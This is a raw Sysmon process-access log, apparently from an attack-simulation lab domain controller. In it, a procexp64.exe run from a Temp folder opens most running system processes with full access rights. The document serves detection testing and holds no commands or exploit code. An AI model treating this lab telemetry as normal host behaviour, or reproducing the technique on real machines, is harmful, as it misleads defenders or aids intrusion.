15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:58.424{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 